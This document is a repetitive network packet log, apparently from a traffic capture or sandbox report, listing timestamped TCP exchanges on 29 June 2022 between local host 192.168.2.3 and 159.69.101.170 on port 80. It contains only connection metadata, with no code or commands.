Jun 29, 2022 23:12:20.466886997 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466905117 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466907024 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466917038 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466933012 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466933012 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466948032 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466953039 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.466986895 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.466999054 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467010975 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467072964 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467087030 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467108011 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467128992 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467135906 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467152119 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467165947 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467180967 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467199087 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467226028 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467247009 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467268944 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467277050 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467303038 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467324018 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467370987 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467391014 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467411995 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467422962 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467432022 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467454910 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467462063 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467475891 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467484951 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467505932 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.467514992 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467528105 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.467550039 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469218016 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469248056 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469274998 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469295025 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469311953 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469327927 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469357967 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469371080 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469389915 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469412088 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469432116 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469434977 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469453096 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469461918 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469474077 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469477892 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469500065 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469501972 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469515085 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469527006 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469532967 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469548941 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469568968 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469579935 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469594955 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469599962 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469614983 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469624996 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469639063 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469644070 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469659090 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469664097 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469681978 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469690084 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469702005 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469707012 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469721079 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469731092 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469749928 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469772100 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469772100 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469796896 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469799042 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469811916 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469820023 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469841003 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469850063 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469862938 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469862938 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469877005 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469886065 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469912052 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469913960 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469923973 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469934940 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469954967 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469969988 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.469975948 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.469997883 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470002890 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470020056 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470024109 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470041990 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470062017 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470062017 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470082998 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470088005 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470104933 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470124006 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470128059 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470134020 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470149040 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470151901 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470169067 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470174074 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470195055 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470206022 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470215082 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470221043 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470228910 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470240116 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470252991 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470262051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470283031 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470295906 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470303059 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470324039 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470330000 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470345020 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470350981 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470367908 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470388889 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470390081 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470411062 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470415115 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470437050 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470439911 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470451117 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470458984 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470478058 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470483065 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470500946 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470501900 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470514059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470524073 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470540047 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470546961 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470562935 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470571995 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470576048 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470590115 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470613956 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470632076 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470634937 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470655918 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470665932 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470679998 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470690966 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470700026 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470702887 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470720053 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470724106 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470747948 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470758915 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470767975 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470772028 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470784903 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470792055 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470813990 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470815897 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470825911 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470835924 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470856905 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470859051 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470880032 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470880032 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470896959 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470904112 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470922947 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470928907 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470937967 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470948935 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470972061 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.470982075 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.470992088 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471007109 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471014977 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471020937 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471038103 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471049070 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471060038 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471060038 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471082926 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471086979 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471100092 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471103907 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471122026 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471127987 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471152067 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471165895 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471174002 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471194983 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471204042 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471215963 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471220016 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471237898 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471255064 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471257925 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471282005 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471286058 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471304893 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471324921 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471326113 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471342087 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471348047 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471370935 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471378088 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471393108 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471405029 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471415043 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471419096 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471437931 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471440077 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471460104 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471461058 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471479893 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471483946 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471501112 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471507072 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471519947 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471533060 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471540928 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471555948 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471576929 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471585035 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471597910 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471610069 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471621037 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471621037 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471642017 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471645117 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471663952 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471673012 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471684933 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471688032 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471707106 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471709013 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471731901 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471733093 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471745014 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471754074 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471765041 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471776962 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471796036 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471800089 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471818924 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471818924 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471833944 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471842051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471859932 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471863985 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471879005 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471885920 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471906900 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471913099 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471925974 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471929073 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471946001 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.471968889 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471990108 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.471991062 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.472011089 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.472012997 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.472033978 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.472038031 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.472053051 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.472057104 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.472069979 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.472079039 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.472100019 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.472101927 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.472121954 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.472137928 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.490982056 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491025925 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491045952 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491077900 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491092920 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491110086 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491116047 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491118908 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491133928 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491157055 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491200924 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491223097 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491245031 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491254091 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491267920 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491271019 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491292000 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491296053 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491319895 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491326094 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491342068 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491344929 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491360903 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491364002 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491381884 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491386890 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491394043 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491420031 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491437912 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491441965 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491462946 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491476059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491483927 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491487980 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491506100 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491527081 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491530895 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491552114 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491559982 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491574049 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491579056 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491595984 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491607904 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491616011 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491620064 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491637945 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491638899 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491657972 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491663933 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.491677999 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.491686106 CEST	80	49792	159.69.101.170	192.168.2.3
